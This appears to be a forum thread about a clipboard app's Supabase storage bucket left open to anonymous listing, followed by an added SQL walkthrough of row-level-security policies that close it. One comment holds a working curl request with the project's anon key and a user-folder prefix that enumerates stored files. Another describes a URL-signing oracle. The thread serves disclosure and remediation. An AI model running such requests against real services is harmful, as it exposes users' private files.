item 46449134 (no title)

imgopaal | 2 months ago

Also Fixed. Images now use signed URLs with 1-year expiration. Public URLs are automatically converted to signed URLs. Storage bucket policies restrict access to user-specific folders. Appreciate you flagging this.

foltik | 1 month ago

It appears to still be wide open:

    curl -X POST \
      "https://wjynmjluabqwqhtdxbtl.supabase.co/storage/v1/object/list/clipboard-images" \
      -H "authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6IndqeW5tamx1YWJxd3FodGR4YnRsIiwicm9sZSI6ImFub24iLCJpYXQiOjE3NDIzODU1MDQsImV4cCI6MjA1Nzk2MTUwNH0.R6pSgPFgHe3ZU9DfKykE98MC1ObYihWdZuhy9v9Y_p0" \
      -H "content-type: application/json" \
      -d '{"prefix": "7b407af2-f30c-4e37-adc7-b7bf48f2661b"}' \
      | jq

Retr0id | 1 month ago

There is also a URL-signing oracle that allows any URL to be signed, so it's still possible to enumerate + download all files. Example: https://wjynmjluabqwqhtdxbtl.supabase.co/storage/v1/object/s...
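The thread above is about what "storage bucket policies restrict access to user-specific folders" has to mean on Supabase Storage for an anon-key listing call like foltik's to stop returning anything. The following is an added example written for this page, not code from the thread or from the project being discussed. It assumes the bucket is named clipboard-images (as in the curl above), that objects are stored under a top-level folder named after the owner's auth user id, and uses hypothetical policy names; the weak policy shown commented out is illustrative of the shape that leaves a bucket listable, not a claim about what the project actually had.

```sql
-- Added example (not the thread's or the project's code). Assumes bucket
-- 'clipboard-images' and object keys of the form '<auth.uid()>/<file>'.
-- Policy names are hypothetical.

-- 1. Make the bucket private. A public bucket serves objects without any
--    policy check, so signed URLs on top of it add nothing.
update storage.buckets set public = false where id = 'clipboard-images';

-- 2. The weak shape (illustrative): a select policy with no role restriction
--    applies to the anon role too, which is exactly what lets an
--    unauthenticated POST to /storage/v1/object/list enumerate the bucket.
--    Anything of this form has to go.
-- create policy "anyone can read clipboard-images" on storage.objects
--   for select using (bucket_id = 'clipboard-images');
drop policy if exists "anyone can read clipboard-images" on storage.objects;

-- 3. The corrected policies: only a signed-in user (role 'authenticated',
--    so the anon key never matches) and only inside the folder named after
--    that user's own auth.uid(). storage.foldername(name) returns the path
--    components of the object key, so element [1] is the top-level folder.
--    Listing, download and signed-URL creation are all gated by the select
--    policy; uploads and deletes get their own.
create policy "owner reads own folder" on storage.objects
  for select to authenticated
  using (
    bucket_id = 'clipboard-images'
    and (storage.foldername(name))[1] = auth.uid()::text
  );

create policy "owner writes own folder" on storage.objects
  for insert to authenticated
  with check (
    bucket_id = 'clipboard-images'
    and (storage.foldername(name))[1] = auth.uid()::text
  );

create policy "owner deletes own folder" on storage.objects
  for delete to authenticated
  using (
    bucket_id = 'clipboard-images'
    and (storage.foldername(name))[1] = auth.uid()::text
  );

-- 4. Check the result from the catalog rather than the dashboard: every
--    remaining select policy on storage.objects should name a role other
--    than 'anon'/'public' and carry a folder condition in its qual.
select policyname, roles, cmd, qual
from pg_policies
where schemaname = 'storage' and tablename = 'objects';
```

Two points worth checking after applying something like this. First, the anon key in foltik's curl is a JWT with "role":"anon", so policies restricted to authenticated exclude it by construction; re-running that exact curl should return an empty list. Second, a signing endpoint reachable with the anon key is what Retr0id's "URL-signing oracle" describes, and Supabase evaluates the select policy on storage.objects when a signed URL is created, so the same owner-folder policy is the thing that closes it; a service-role key bypasses RLS entirely and must never be shipped to the client.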